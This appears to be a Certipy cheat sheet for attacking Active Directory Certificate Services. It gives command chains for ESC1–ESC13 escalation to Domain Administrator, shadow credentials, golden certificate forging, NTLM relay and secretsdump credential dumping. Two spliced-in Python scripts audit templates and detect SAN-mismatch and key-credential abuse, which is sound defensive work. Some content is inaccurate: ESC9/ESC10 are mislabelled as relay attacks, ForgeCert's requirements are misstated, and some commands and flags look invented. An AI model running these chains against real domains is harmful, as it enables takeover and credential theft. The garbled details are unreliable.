
Certipy

Certipy is a powerful Python tool designed for Active Directory Certificate Services (AD CS) enumeration, exploitation, and privilege escalation. It automates the discovery and exploitation of vulnerable certificate configurations, including ESC1-ESC13 vulnerabilities, making it essential for red teamers targeting modern AD environments.

# Install from PyPI
pip install certipy-ad

# Or install from source
git clone https://github.com/ly4k/Certipy.git
cd Certipy
pip install -r requirements.txt
python3 -m certipy --help

# Verify the installation
certipy --version
certipy --help

# Quick start: enumerate, list vulnerable templates, request a certificate, authenticate with it
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -vulnerable
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 -ca 'CA-NAME' -template vulnerable-template
certipy auth -pfx cert.pfx -dc-ip 192.168.1.100
# Basic enumeration
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100

# Show only enabled templates (disabled templates are omitted)
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -enabled

# Show only vulnerable templates
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -vulnerable

# Output as text (human-readable)
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -text

# Output as JSON (programmatic)
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -json

# Output to stdout (for piping)
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -stdout

# Export for BloodHound (old format)
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -old-bloodhound

# Export for BloodHound (compatible with newer versions)
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -json > output.json
| Flag | Purpose |
|---|---|
| -u | Username (format: user@domain.com) |
| -p | Password |
| -dc-ip | Domain Controller IP address |
| -enabled | Show enabled templates only |
| -vulnerable | Show vulnerable templates only |
| -text | Output in text format |
| -json | Output in JSON format |
| -stdout | Output to stdout |
| -old-bloodhound | Export for BloodHound compatibility |

ESC1. Vulnerable when: Template allows SAN specification and has an EKU allowing authentication.

# Enumerate for ESC1
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -vulnerable

# Request certificate with arbitrary SAN for Domain Admin
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template vulnerable-template -san Administrator@domain.com

# Extract and use certificate for authentication
certipy auth -pfx Administrator.pfx -dc-ip 192.168.1.100

ESC2. Vulnerable when: Certificate template has “Any Purpose” EKU, allowing use for any purpose.

# Enumerate for ESC2
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -vulnerable

# Request certificate
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template any-purpose-template

# Use for NTLM relay or other purposes
certipy auth -pfx cert.pfx -dc-ip 192.168.1.100

ESC3. Vulnerable when: Enrollment agent template exists and can request certificates on behalf of other users.

# Step 1: Request enrollment agent certificate
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template enrollment-agent

# Step 2: Use enrollment agent to request certificate for Domain Admin
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template vulnerable-template -on-behalf-of 'domain\Administrator' \
  -pfx enrollment-agent.pfx

# Step 3: Authenticate as Domain Admin
certipy auth -pfx Administrator.pfx -dc-ip 192.168.1.100

ESC4. Vulnerable when: Non-admin users have WRITE or OWNER permissions on certificate templates.

# Enumerate template permissions
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -text | grep -A 20 "Permissions"

# Modify template to enable SAN (if you have write permissions)
certipy template -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -template vulnerable-template -modify -enable-san

# Request certificate with SAN
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template vulnerable-template -san Administrator@domain.com

ESC5. Vulnerable when: Non-admin users have control over PKI objects (CA, NTAuthCertificates, etc.).

# Enumerate PKI object permissions
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -text

# Modify PKI objects to add malicious certificate publisher
# (Requires specific permissions)
certipy pki -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -dc 'DC-NAME' -modify

ESC6. Vulnerable when: EDITF_ATTRIBUTESUBJECTALTNAME2 flag is enabled on the CA, allowing any template to use SAN.

# Enumerate CA flags
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -text | grep -i "EDITF"

# Request any template with arbitrary SAN
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template user -san Administrator@domain.com

# Authenticate as Domain Admin
certipy auth -pfx Administrator.pfx -dc-ip 192.168.1.100

ESC7. Vulnerable when: Non-admin users have WRITE or OWNER permissions on the CA object.

# Enumerate CA permissions
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -text | grep -A 10 "CA Permissions"

# Modify CA to enable EDITF_ATTRIBUTESUBJECTALTNAME2
certipy ca -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -modify -enable-editf

# Request certificate with SAN
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template user -san Administrator@domain.com

ESC8. Vulnerable when: HTTP enrollment is enabled without HTTPS requirement.

# Set up NTLM relay to CA web enrollment
# (Requires ntlmrelayx from Impacket)
certipy relay -dc-ip 192.168.1.100 -ca 'CA-SERVER' -template vulnerable-template

# Trigger NTLM authentication (via compromised system or coercion)
# Relayed credentials authenticate to CA web enrollment
# Certificate is requested and enrolled
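The `-json` export described earlier and the "Vulnerable when" conditions for ESC1, ESC2, ESC3, ESC4, ESC6 and ESC8 can be turned into a defender-side audit that reports what to fix rather than what to request. The script below is an added example, not Certipy code and not part of the original page. The JSON key names it reads ("Certificate Templates", "Enrollee Supplies Subject", "Enrollment Rights", "User Specified SAN", "Web Enrollment" and so on) are assumed to match the shape of `certipy find -json` output, and the sample export is constructed.

```python
"""Defender-side audit of a `certipy find -json` style export.

Added example, not Certipy code. The key names read here are ASSUMED to
match Certipy's JSON output; SAMPLE_JSON is a constructed export.
"""
import json

# Principals that mean "practically every domain account can enroll".
LOW_PRIV_GROUPS = {"domain users", "authenticated users", "domain computers", "everyone"}


def is_low_priv(principal):
    """'CORP\\Domain Users' -> True; 'CORP\\Domain Admins' -> False."""
    return principal.split("\\")[-1].strip().lower() in LOW_PRIV_GROUPS


def any_low_priv(principals):
    return any(is_low_priv(p) for p in principals or [])


def open_enrollment(t):
    """Enabled, no manager approval, no co-signatures, broad enrollment rights."""
    enroll = t.get("Permissions", {}).get("Enrollment Permissions", {})
    return (t.get("Enabled", False)
            and not t.get("Requires Manager Approval", False)
            and t.get("Authorized Signatures Required", 0) == 0
            and any_low_priv(enroll.get("Enrollment Rights")))


def audit_template(t):
    """Return (template, ESC code, remediation) tuples for one template record."""
    name = t.get("Template Name", "?")
    eku = [e.lower() for e in t.get("Extended Key Usage", [])]
    client_auth = t.get("Client Authentication") or "client authentication" in eku
    findings = []
    if open_enrollment(t):
        if t.get("Enrollee Supplies Subject") and client_auth:
            findings.append((name, "ESC1", "clear 'Supply in the request' or restrict enrollment rights"))
        if t.get("Any Purpose") or not eku:
            findings.append((name, "ESC2", "replace Any Purpose / empty EKU with the specific EKU needed"))
        if t.get("Enrollment Agent") or "certificate request agent" in eku:
            findings.append((name, "ESC3", "restrict enrollment and configure enrollment agent restrictions on the CA"))
    ctrl = t.get("Permissions", {}).get("Object Control Permissions", {})
    writers = (ctrl.get("Write Owner Principals", []) + ctrl.get("Write Dacl Principals", [])
               + ctrl.get("Write Property Principals", []))
    if any_low_priv(writers) or is_low_priv(ctrl.get("Owner", "")):
        findings.append((name, "ESC4", "remove write/owner rights from low-privileged principals"))
    return findings


def audit_ca(ca):
    """Return (CA, ESC code, remediation) tuples for one CA record."""
    name = ca.get("CA Name", "?")
    findings = []
    if str(ca.get("User Specified SAN", "")).lower() == "enabled":
        findings.append((name, "ESC6", "clear EDITF_ATTRIBUTESUBJECTALTNAME2 and restart CertSvc"))
    if str(ca.get("Web Enrollment", "")).lower() == "enabled":
        findings.append((name, "ESC8", "disable web enrollment or require HTTPS with Extended Protection"))
    return findings


def audit_export(text):
    """Parse a JSON export and audit every CA and template in it."""
    data = json.loads(text)
    findings = []
    for ca in data.get("Certificate Authorities", {}).values():
        findings.extend(audit_ca(ca))
    for t in data.get("Certificate Templates", {}).values():
        findings.extend(audit_template(t))
    return findings


# Constructed sample export (not real data).
SAMPLE_JSON = json.dumps({
    "Certificate Authorities": {"0": {"CA Name": "CORP-CA", "User Specified SAN": "Enabled",
                                      "Web Enrollment": "Enabled"}},
    "Certificate Templates": {
        "0": {"Template Name": "WebServerOpen", "Enabled": True, "Enrollee Supplies Subject": True,
              "Client Authentication": True, "Any Purpose": False, "Enrollment Agent": False,
              "Requires Manager Approval": False, "Authorized Signatures Required": 0,
              "Extended Key Usage": ["Client Authentication", "Server Authentication"],
              "Permissions": {"Enrollment Permissions": {"Enrollment Rights": ["CORP\\Domain Users"]},
                              "Object Control Permissions": {"Owner": "CORP\\Enterprise Admins",
                                                             "Write Property Principals": ["CORP\\Domain Admins"]}}},
        "1": {"Template Name": "LegacyAnyPurpose", "Enabled": True, "Enrollee Supplies Subject": False,
              "Client Authentication": True, "Any Purpose": True, "Enrollment Agent": False,
              "Requires Manager Approval": False, "Authorized Signatures Required": 0,
              "Extended Key Usage": ["Any Purpose"],
              "Permissions": {"Enrollment Permissions": {"Enrollment Rights": ["CORP\\Authenticated Users"]},
                              "Object Control Permissions": {"Owner": "CORP\\Enterprise Admins",
                                                             "Write Property Principals": ["CORP\\Domain Users"]}}},
        # Agent template gated by manager approval: reported as nothing.
        "2": {"Template Name": "AgentTpl", "Enabled": True, "Enrollee Supplies Subject": False,
              "Client Authentication": False, "Any Purpose": False, "Enrollment Agent": True,
              "Requires Manager Approval": True, "Authorized Signatures Required": 0,
              "Extended Key Usage": ["Certificate Request Agent"],
              "Permissions": {"Enrollment Permissions": {"Enrollment Rights": ["CORP\\Domain Users"]},
                              "Object Control Permissions": {"Owner": "CORP\\Enterprise Admins",
                                                             "Write Property Principals": ["CORP\\Domain Admins"]}}},
    },
})

if __name__ == "__main__":
    for obj, esc, fix in audit_export(SAMPLE_JSON):
        print(f"{esc:5} {obj:18} -> {fix}")
```

The point of the manager-approval and signature checks is that a template with an open subject or a broad EKU is only reachable by a low-privileged account when nothing gates issuance; the AgentTpl record shows a configuration that Certipy's "Vulnerable when" condition for ESC3 would otherwise match but that approval neutralises. Run it against a real export with `audit_export(open("findings.json").read())`.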

ESC9/ESC10. Vulnerable when: Certificate templates lack security extension, allowing NTLM relay without token binding.

# Enumerate for ESC9/ESC10
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -vulnerable

# NTLM relay attack targeting the template
# (Requires coercion or compromised account)
certipy relay -dc-ip 192.168.1.100 -ca 'CA-SERVER' \
  -template vulnerable-template

ESC11. Vulnerable when: RPC authentication is relayed to AD CS without protection.

# Set up RPC relay (advanced technique)
# Requires interception and relay of RPC traffic to CA
# Typically combined with coercion techniques

certipy relay -rpc -dc-ip 192.168.1.100 -ca 'CA-SERVER'

ESC13. Vulnerable when: OID group links allow elevation of privilege through certificate issuance.

# Enumerate OID links
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -text | grep -i "OID"

# Request certificate leveraging vulnerable OID link
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template vulnerable-template

# Direct PKINIT authentication
certipy auth -pfx Administrator.pfx -dc-ip 192.168.1.100

# Request TGT using certificate
certipy auth -pfx cert.pfx -dc-ip 192.168.1.100 -kerberos

# Output TGT to file
certipy auth -pfx cert.pfx -dc-ip 192.168.1.100 -out tgt.ccache

# Authenticate via LDAPS
certipy auth -pfx cert.pfx -dc-ip 192.168.1.100 -ldap-shell

# Interactive LDAP shell for further enumeration
certipy auth -pfx cert.pfx -dc-ip 192.168.1.100 -ldap-shell -verbose

# Export TGT for later use
certipy auth -pfx Administrator.pfx -dc-ip 192.168.1.100 \
  -out ticket.ccache

# Use TGT for authentication
export KRB5CCNAME=ticket.ccache
secretsdump.py -k -no-pass domain.com/Administrator@DC-NAME

# Request certificate from specific template
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template User

# Specify alternate output name
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template User -out mycert

# Request with arbitrary SAN
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template vulnerable-template \
  -san Administrator@domain.com

# Multiple SANs
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template vulnerable-template \
  -san 'Administrator@domain.com' -san 'user2@domain.com'

# Requires enrollment agent certificate
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template vulnerable-template \
  -on-behalf-of 'domain\Administrator' \
  -pfx enrollment-agent.pfx

# PFX format (default)
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template User -out cert.pfx

# PEM format
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template User -out cert.pem

# Add msDS-KeyCredentialLink attribute
certipy shadow -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -account Administrator -action add

# Returns KeyCredential data for later authentication

# List all shadow credentials on an account
certipy shadow -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -account Administrator -action list

# Remove shadow credentials from account
certipy shadow -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -account Administrator -action remove

# Automatically add, generate cert, and create TGT
certipy shadow -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -account Administrator -action auto

# Display shadow credentials information
certipy shadow -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -account Administrator -action info

# Extract CA private key (requires SYSTEM on CA server)
certipy ca -pfx ca-cert.pfx -export

# Create certificate for arbitrary user
certipy forge -ca-pfx ca-cert.pfx -upn Administrator@domain.com \
  -out golden-cert.pfx

# Authenticate with golden certificate
certipy auth -pfx golden-cert.pfx -dc-ip 192.168.1.100

# Create persistent certificate for Domain Persistence
certipy req -u user@domain.com -p password -dc-ip 192.168.1.100 \
  -ca 'CA-NAME' -template User

# Store certificate securely for later use
# Use certipy auth to authenticate after domain compromise recovery

# Start relay listener on HTTP enrollment endpoint
certipy relay -dc-ip 192.168.1.100 -ca 'CA-SERVER' \
  -template vulnerable-template

# Trigger NTLM authentication from target (via coercion or compromise)
# Relay will automatically request certificate

# Use resulting certificate
certipy auth -pfx Administrator.pfx -dc-ip 192.168.1.100

# Advanced RPC-based relay attack
certipy relay -rpc -dc-ip 192.168.1.100 -ca 'CA-SERVER'

# Save findings as a text report or as JSON
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -text > findings.txt
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -json > findings.json

# Export for BloodHound (compatible with CE and Enterprise)
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -json > bh-data.json

# Import in BloodHound: Raw queries → Import → select file

# Pretty-print the JSON from stdout with jq
certipy find -u user@domain.com -p password -dc-ip 192.168.1.100 -stdout | jq '.'
| Issue | Solution |
|---|---|
| Authentication failed | Verify credentials and DC IP; ensure user has domain access |
| CA not found | Check CA name with -text output; use exact case-sensitive name |
| Certificate enrollment denied | Verify template permissions; check NTAuthCertificates |
| PKINIT not working | Ensure PKINIT is enabled on domain; check certificate EKU |
| No vulnerable templates found | ESC vulnerabilities may not exist; enumerate all templates first |
| Connection timeout | Verify DC IP is reachable; check firewall rules for LDAP/DC access |
  • Always enumerate first: Run certipy find before attempting any exploitation
  • Document findings: Export results as JSON for analysis and reporting
  • Test in lab first: Validate techniques in isolated test environment before production
  • Check template permissions: ESC4 vulnerabilities often require understanding ACLs
  • Disable vulnerable templates: Remediate ESC vulnerabilities by disabling templates or removing EKUs
  • Monitor CA activity: Check CA logs for suspicious certificate requests
  • Use strong credentials: Ensure accounts used for testing have appropriate permissions
  • Clean up certificates: Remove test certificates and shadow credentials after testing
  • Follow least privilege: Request only necessary templates; avoid unnecessary SAN values
  • Track certificate lifecycle: Monitor issuance, usage, and revocation of test certificates
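The "Monitor CA activity" and "Clean up certificates" items above translate into two concrete detections: certificates issued with a SAN that names an account other than the requester (the trace left by the SAN-based paths, ESC1 and ESC6), and writes to msDS-KeyCredentialLink by an account other than the object itself (the trace left by shadow credentials). The script below is an added example, not Certipy code and not from the original page. Event IDs 4887 (Certificate Services issued a certificate) and 5136 (directory service object modified) are real Windows audit events, but the flat record layout used here is a simplified assumption about their fields; the allow-list name and the sample events are constructed.

```python
"""Two detections over CA and directory audit events.

Added example, not Certipy or page code. Events 4887 and 5136 are real
Windows audit event IDs; the flat dict per record is an ASSUMED simplified
rendering of their fields, and SAMPLE_EVENTS is constructed.
"""
import re

# Accounts allowed to write msDS-KeyCredentialLink on objects other than
# their own (e.g. a device-provisioning service). Assumed name for the example.
KEYCRED_WRITERS_ALLOWED = {"svc-device-provisioning"}


def parse_request_attributes(attrs):
    """CA request attributes arrive as 'key:value' lines; return a lowercase-key dict."""
    out = {}
    for line in re.split(r"\r?\n", attrs or ""):
        if ":" in line:
            key, value = line.split(":", 1)
            out[key.strip().lower()] = value.strip()
    return out


def san_upns(san):
    """'upn=a@corp.local&dns=host' -> ['a@corp.local']."""
    upns = []
    for part in san.split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            if key.strip().lower() == "upn":
                upns.append(value.strip().lower())
    return upns


def account_name(principal):
    """'CORP\\jdoe' -> 'jdoe'; 'WS01$' -> 'ws01'; 'a@corp.local' -> 'a'."""
    return principal.split("\\")[-1].split("@")[0].rstrip("$").lower()


def object_cn(dn):
    """Leading CN of a distinguished name, lowercased."""
    m = re.match(r"\s*CN=([^,]+)", dn or "", re.IGNORECASE)
    return m.group(1).strip().lower() if m else ""


def detect(events):
    """Run both rules; return a list of alert dicts naming the offending event index."""
    alerts = []
    for i, ev in enumerate(events):
        if ev.get("EventID") == 4887:
            attrs = parse_request_attributes(ev.get("Attributes", ""))
            requester = account_name(ev.get("Requester", ""))
            for upn in san_upns(attrs.get("san", "")):
                if account_name(upn) != requester:  # certificate issued for someone else
                    alerts.append({"rule": "san-mismatch", "index": i,
                                   "detail": f"{ev.get('Requester')} obtained a certificate for {upn} "
                                             f"via template {attrs.get('certificatetemplate', '?')}"})
        elif (ev.get("EventID") == 5136
              and ev.get("AttributeLDAPDisplayName", "").lower() == "msds-keycredentiallink"):
            writer = account_name(ev.get("SubjectUserName", ""))
            target = object_cn(ev.get("ObjectDN", ""))
            if writer != target and writer not in KEYCRED_WRITERS_ALLOWED:
                alerts.append({"rule": "keycredentiallink-foreign-writer", "index": i,
                               "detail": f"{ev.get('SubjectUserName')} modified msDS-KeyCredentialLink "
                                         f"on {ev.get('ObjectDN')}"})
    return alerts


# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4887, "Requester": "CORP\\jdoe",
     "Attributes": "CertificateTemplate:User"},
    {"EventID": 4887, "Requester": "CORP\\jdoe",
     "Attributes": "CertificateTemplate:WebServerOpen\r\nSAN:upn=Administrator@corp.local"},
    {"EventID": 4887, "Requester": "CORP\\svc-autoenroll",
     "Attributes": "CertificateTemplate:User\r\nSAN:upn=svc-autoenroll@corp.local"},
    {"EventID": 5136, "SubjectUserName": "jdoe",
     "ObjectDN": "CN=Administrator,CN=Users,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    # A computer enrolling its own key (device registration) writes to its own object: benign.
    {"EventID": 5136, "SubjectUserName": "WS01$",
     "ObjectDN": "CN=WS01,CN=Computers,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['rule']}] event #{a['index']}: {a['detail']}")
```

Both rules need the corresponding auditing switched on: 4887 requires the Certification Services audit subcategory on the CA, and 5136 requires Directory Service Changes auditing plus a SACL on the accounts whose msDS-KeyCredentialLink you want watched. The self-write exception for 5136 exists because legitimate device registration writes to the computer's own object; a Certipy `shadow -action add` against another account is exactly the foreign-writer case the second rule flags.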
| Tool | Purpose |
|---|---|
| Certify | C# alternative for AD CS enumeration (Windows environments) |
| ForgeCert | Forge certificates without CA private key (older technique) |
| PKINITtools | PKINIT-based attack tools for Kerberos exploitation |
| Rubeus | Kerberos interaction tool; pairs with certificate-based attacks |
| ntlmrelayx | Impacket tool for NTLM relay attacks (pairs with Certipy relay) |
| BloodHound | Network analysis; visualize certificate attack paths |
| ADCSPwn | Older tool for AD CS exploitation (use Certipy instead) |